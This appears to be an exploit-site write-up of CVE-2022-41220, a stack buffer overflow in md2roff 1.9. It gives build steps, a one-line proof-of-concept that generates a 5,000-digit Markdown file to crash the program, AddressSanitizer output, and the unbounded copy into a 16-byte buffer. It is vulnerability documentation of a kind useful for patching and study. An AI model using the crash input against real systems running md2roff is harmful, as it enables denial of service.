Share 
## https://sploitus.com/exploit?id=95FD807D-0A39-5B39-8B81-0A2743804034
# Description of CVE-2022-41220

md2roff 1.9 suffers from a stack-based buffer overflow via a Markdown file containing a large number of consecutive characters to be processed. 


# Replication

To replicate the vulnerability, we must download a vulnerable version of md2roff (version 1.9):

```
git clone https://github.com/nereusx/md2roff.git
cd md2roff
git checkout 
make
```

Once the project is compiled, we can start by creating a malicious markdown file with a large buffer of ascii characters:

```
python3 -c 'print("1"*5000)' > poc.md
```

Now we can point md2roff to our malicious markdown file and invoke a crash:

```
./md2roff poc.md
```

Executing the previous command will produce a segfault:

```
segmentation fault  ./md2roff poc.md
```

To gain a better understanding of where the overflow is taking place, lets recompile the project with address sanitizer (ASAN) by adding *-fsanitize=address* to the CFLAGS variable in the Makefile.  We also want the compiler to store symbol table information in the executable (-g flag) to help us determine which line of code produced the crash:

```
CFLAGS = -std=c99 -fsanitize=address -g
```

Next we will clean any stale files and recompile the project:

```
make clean
make
```

The output from ASAN shows us that the vulnerable source code can be found in *md2roff.c, line 1145*:
```
==195321==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffe74125200 at pc 0x556f11052d64 bp 0x7ffe74125000 sp 0x7ffe74124ff8
WRITE of size 1 at 0x7ffe74125200 thread T0
    #0 0x556f11052d63 in md2roff /dev/shm/md2roff/md2roff.c:1145
    #1 0x556f110557cf in main /dev/shm/md2roff/md2roff.c:1464
    #2 0x7f9ad3846189 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
    #3 0x7f9ad3846244 in __libc_start_main_impl ../csu/libc-start.c:381
    #4 0x556f110493a0 in _start (/dev/shm/md2roff/md2roff+0x73a0)

Address 0x7ffe74125200 is located in stack of thread T0 at offset 80 in frame
    #0 0x556f1104cd7e in md2roff /dev/shm/md2roff/md2roff.c:655

  This frame has 6 object(s):
    [32, 40) 'tt' (line 724)
    [64, 80) 'num' (line 1140) <== Memory access at offset 80 overflows this variable
    [96, 352) 'secname' (line 662)
    [416, 672) 'appname' (line 662)
    [736, 992) 'appsec' (line 662)
    [1056, 1312) 'appdate' (line 662)
HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
      (longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow /dev/shm/md2roff/md2roff.c:1145 in md2roff
Shadow bytes around the buggy address:
  0x10004e81c9f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004e81ca00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004e81ca10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004e81ca20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004e81ca30: 00 00 00 00 00 00 f1 f1 f1 f1 f8 f2 f2 f2 00 00
=>0x10004e81ca40:[f2]f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004e81ca50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004e81ca60: 00 00 f2 f2 f2 f2 f2 f2 f2 f2 00 00 00 00 00 00
  0x10004e81ca70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10004e81ca80: 00 00 00 00 00 00 00 00 00 00 f2 f2 f2 f2 f2 f2
  0x10004e81ca90: f2 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==195321==ABORTING

```

# Vulnerable source code:

```
else if ( isdigit(*p) ) { // ordered list
  char	num[16], *n;
  const char *pstub = p;

  n = num;
  while ( isdigit(*p) )
    *n ++ = *p ++;
  *n = '\0';
```


# References
* https://vulners.com/cve/CVE-2022-41220
* https://owasp.org/www-community/vulnerabilities/Buffer_Overflow